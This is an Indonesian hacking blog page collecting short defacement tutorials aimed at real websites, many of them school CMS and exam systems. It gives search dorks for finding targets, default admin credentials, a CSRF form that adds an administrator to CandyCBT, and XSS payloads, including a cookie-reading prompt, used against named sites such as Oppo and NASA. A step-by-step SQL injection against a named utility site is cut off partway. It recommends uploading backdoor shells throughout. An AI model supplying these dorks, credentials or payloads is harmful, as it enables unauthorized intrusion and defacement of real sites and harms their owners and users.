Postingan

Deface Default u/p CMS web sekolahku

Gambar
Okeh bro kembali lagi dengan gua Babacang07 kali ini we akan upload cara depes Default u/p CMS web sekolahku okh jngn banyak bcd lesstgoo :)

Bahan² 
1.shell backdoor 2.sc depes lu 3.kopi  4.malkist Kokola biar halal depesnya :v 5.pantang menyerah

Dork:
"Developed by sekolahku.web.id" Copyright © 2014 - 2020 sekolahku.web.id All Rights Reserved
Kembangin lagi bro biar dapet yang fresh
Exploit: https://mantan.com/login
Laju ke tutorialnya
Seperti biasa kalian dorking dulu pakek dork yang dah we sediain di atas
Nahh habis kalian dorking kalian masukkan Exploit nya di belakang site contoh https:mantan.co.ok/login nahh nanti otomatis langsung di arahkan ke page login

Nahh kalian masukkan user sama pw nya di situ kalo vlun otomatis masuk ke dashboard mimin

Nahh kalo udh masuk ke dashboard mimin terserah kalian webnya mau di apain, cukup segini tutor dari we bro :)


thanksall member KBCII OFF jngn lupa share broh


CandyCBT v2.8.0 r !!!add admin

Gambar
Heyoyo bree bertemu dengan saya lagi kali ini gua upload cara deface candy CBT iya yang biasanya di sebut Computer Basics Test tu loh buat ujian sekolah gak tau gak usah sekolah bree: (admin
Langsung saja ke tutornya
1.Dork:
 ~> "Responsive Image" + "Support" intitle:Login
~> intex support by candy cbt v2.8.0
~> inurl: login CBT site:.sch.id

2.shell banyak di google terserah mau pake yng mana  3.Crsf add mimin
<html> <head></head> <body> <form action="https://mantanlucnut.cok/admin/?pg=pengawas" method="post"> <label>nip</label> <input type="text" name="nip" value="123761717" required="true" /> <br> <label>nama</label> <input type="text" name="nama" required="true" /> <br> <label>username</label> <input type="text" name="username" required="true" /> <br> <…

Deface default u/p wordpress

Gambar
Assalamualaikum wr.wbBertemu lagi dengan gw di blog Babacang ge disini bakalan kasih tutor tentang Deface default u/p wordpress caranya ialah dengan mudah sebenarnya ini salah admin wordpress karena kaga di ganti user sama pasnya jadinya gampang di bobol websitenya: v  Ok bree jangan banyak bcd langsung ke tutornya

Bahan-bahan 1.script depes kalian  2.shell Backdoor/mini shell 3.Exploit: wp-login.php 4.malkis Kokola biar halal: v
Dork  intitle:"My Blog My Wordpress blog" intitle: My Blog My wordpress site:  intitle :My blog My wordpress

1.User: admin    Pass: pass
2.User: admin

Deface Poc Cwcontrol Default User/Pass

Gambar
Assalamu'alaikum wr.wb Ok bree kita bahas cara deface poc cwcontrol default user/pass 

Lanjut bree 
Dork:inurl:/cwcontrol            intext:"design by channel wide computer"                                          
Exploit : /cwcontrol
user : admin password : cw774411

Bahan-bahan 1.script depes kalean: v 2.shell backdoor  3.luak white coffee 4.malkis Kokola biar halal: v

Step by step

Pertama kalian dorking pakek dork di atas udah saya siapin bree: v

Nahh kalian tambah Exploit di belakang site terus otomatis ada tempat login.nahh kalian tinggal masukkan user sama pass nya 

Nahh kalo vlun otomatis masuk ke dashboard mimin terserah kalian mau di apakan web tersebut:) 



Okh bree sekian tutornya Jangan lupa share:) Heppy deface  Enjoy deface




Bug Xss up Jso web Oppo

Gambar
Assalamu'alaikum wr,wb  kembali lagi di blog Babacang kali ini upload lagi Bug Xss up Jso web oppo tapi ini sudah lama Bug nya tapi lumayan buat pemula buat belajar:) 

Alat tempur 
1. </title><DetAILS/+/OntoGgle%09=%09(prompt)``%0DX> 2.script Jso  3.kesabaran 4.malkis Kokola biar halal:)  5.Jasjus

Langsung meluncur ke tkp


Pertama kalian kunjungi web oppo,nahh terus kalian klik serch terus kalian isikan sesui selera kalian,gak paham liat di fotonya:) 


Nahh kalok muncul drama kek gitu berarti bisa di depes website nya:) 


Nahh kalok udah kalian masukkan payload yang udah di siapin di atas lalu pastekan lalu klik enter

Nahh kalo blank langsung kita eksekusi webnya tersebut,ohh iya sebelumnya kalian ubah ke situs dekstop dulu: v  Kalian salin script Jso kalian terus pastekan di belakang payload tersebut

Dann boom berhasil kann:) 

- Kunjungi juga blog team KBCII kbcii.blogspot.com/ - jangan lupa share - thnks all member KBCII

Bug Xss upload Jso Web Nasa 2020

Gambar
Assalamu'alaikum wr.wb Kembali di blog Babacang kali ini saya akan share Bug Xss dan up Jso pada web Nasa muehehe 
Pengertian Xss XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Bahan-bahan 
1.javascript:prompt(document.cookie)  2.script Jso kalian 3.kesabaran:)  4.luwak white koffie 5.malkis Kokola biar halal : v

langsung ke tkp bro jangan banyak bcd nanti jiwa blekhet mu luntur : v
Pertama tama kalian dorking,gundulmu dorking tinggal ketik Nasa.gov dah nongol: v
Nahh kalian tinggal pergi ke atas/di URL,tapi ingat kalian jangan sampe salah,kaga bakan di Terima sama NASA awokawok: v
Nahh kalo berhasil nanti akan muncul seperti gambar ini,jika tidak bera…

SQL Injection Step by Step.

Gambar
***********************************************  * SQL Injection, step by step.  * Impact : MS-SQL Server ************************************************
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ? Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini. Catatan : kita akan membatasi bahasan pada SQL Injection  di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id Ada dua kelemahan di site ini, yaitu: 1. Tabel News 2. Tabel Admin
Langkah pertama, kita tentukan lubang mana yang bisa di-inject dengan jalan berjalan-jalan (enumeration) dulu di site tsb. Kita akan menemukan 2 model cara input parameter, yaitu dengan cara memasukkan lewat input box dan memasukkannya lewat alamat URL.
Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin. Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp Langkah pertama untuk menentukan nama tabel dan fieldnya, kita inject ko…